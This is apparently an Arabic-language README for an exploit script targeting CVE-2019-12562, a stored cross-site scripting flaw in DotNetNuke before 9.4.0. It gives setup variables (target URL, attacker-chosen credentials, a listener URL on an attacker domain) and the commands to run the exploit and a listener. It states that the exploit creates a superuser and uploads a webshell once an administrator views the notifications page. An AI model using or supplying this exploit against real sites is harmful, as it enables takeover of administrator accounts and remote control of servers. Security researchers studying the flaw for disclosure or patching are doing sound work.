
ثغرة XSS مخزّنة في DotNetNuke (DNN) قبل الإصدار 9.4.0 | من XSS إلى RCE
CVE-2019-12562 تسمح البرمجة النصية العابرة للمواقع المخزّنة (Stored Cross-Site Scripting) في DotNetNuke (DNN) الإصدارات قبل 9.4.0 للمهاجمين عن بُعد بتخزين البرنامج النصي الخبيث ودمجه في صفحة إشعارات المسؤول. يمكن استخدام هذا الاستغلال لتنفيذ أي إجراء بصلاحيات المسؤول مثل إدارة المحتوى، إضافة المستخدمين، رفع البوابات الخلفية (backdoors) إلى الخادم، وغير ذلك. يحدث الاستغلال الناجح عندما يزور مستخدم مسؤول صفحة إشعارات تحتوي على برمجة نصية عابرة للمواقع مخزّنة.
TARGET_URL = "http://targetdomain/DotNetNuke"
USERNAME = "MAYASEVEN" # At least five characters long
PASSWORD = "P@ssw0rd" # At least 0 non-alphanumeric characters, At least 7 characters
EMAIL = "[email protected]" # Change email to any you want
# A web server for listening an event
LISTEN_URL = "http://yourdomain.com:1337"
python3 CVE-2019-12562.py
python -m SimpleHTTPServer 1337
سيقوم هذا الاستغلال بإنشاء مستخدم خارق (superuser) ورفع ويب شيل (webshell) إلى الخادم الهدف
شرط الاستغلال: يحدث الاستغلال الناجح عندما يزور مستخدم مسؤول صفحة إشعارات.
اقرأ المزيد: https://mayaseven.com/cve-2019-12562-stored-cross-site-scripting-in-dotnetnuke-dnn-version-v9-3-2/ مرجع CVE: https://www.cvedetails.com/cve/CVE-2019-12562/